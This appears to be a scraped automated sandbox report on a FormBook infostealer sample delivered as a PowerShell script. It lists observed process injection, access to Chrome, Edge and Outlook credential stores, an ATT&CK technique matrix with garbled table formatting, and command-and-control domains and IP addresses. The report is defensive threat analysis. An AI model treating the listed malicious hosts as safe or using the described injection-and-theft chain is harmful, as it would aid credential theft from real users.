                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		3
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory113
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)612
                Process Injection                		1
                Abuse Elevation Control Mechanism                		Security Account Manager221
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Timestomp                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Masquerading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron612
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1615024 Sample: LLLLLLLLASSSEERRRR.ps1 Startdate: 14/02/2025 Architecture: WINDOWS Score: 100 39 www.seasay.xyz 2->39 41 www.l63339.xyz 2->41 43 5 other IPs or domains 2->43 61 Suricata IDS alerts for network traffic 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for URL or domain 2->65 69 5 other signatures 2->69 11 powershell.exe 16 2->11         started        15 notepad.exe 5 2->15         started        signatures3 67 Performs DNS queries to domains with low reputation 41->67 process4 file5 37 C:\Users\user\AppData\Local\Temp\x.exe, PE32 11->37 dropped 75 Suspicious execution chain found 11->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 11->77 79 Powershell drops PE file 11->79 17 x.exe 3 11->17         started        20 conhost.exe 11->20         started        signatures6 process7 signatures8 53 Antivirus detection for dropped file 17->53 55 Multi AV Scanner detection for dropped file 17->55 57 Writes to foreign memory regions 17->57 59 2 other signatures 17->59 22 RegAsm.exe 17->22         started        process9 signatures10 71 Maps a DLL or memory area into another process 22->71 25 y85te3vqfc6QGAKyw78l.exe 22->25 injected process11 signatures12 73 Found direct / indirect Syscall (likely to bypass EDR) 25->73 28 runonce.exe 13 25->28         started        process13 signatures14 81 Tries to steal Mail credentials (via file / registry access) 28->81 83 Tries to harvest and steal browser information (history, passwords, etc) 28->83 85 Modifies the context of a thread in another process (thread injection) 28->85 87 3 other signatures 28->87 31 y85te3vqfc6QGAKyw78l.exe 28->31 injected 35 firefox.exe 28->35         started        process15 dnsIp16 45 www.seasay.xyz 103.106.67.112, 59020, 59021, 59022 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 31->45 47 www.lucynoel6465.shop 104.21.112.1, 59028, 59029, 59030 CLOUDFLARENETUS United States 31->47 49 3 other IPs or domains 31->49 51 Found direct / indirect Syscall (likely to bypass EDR) 31->51 signatures17

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.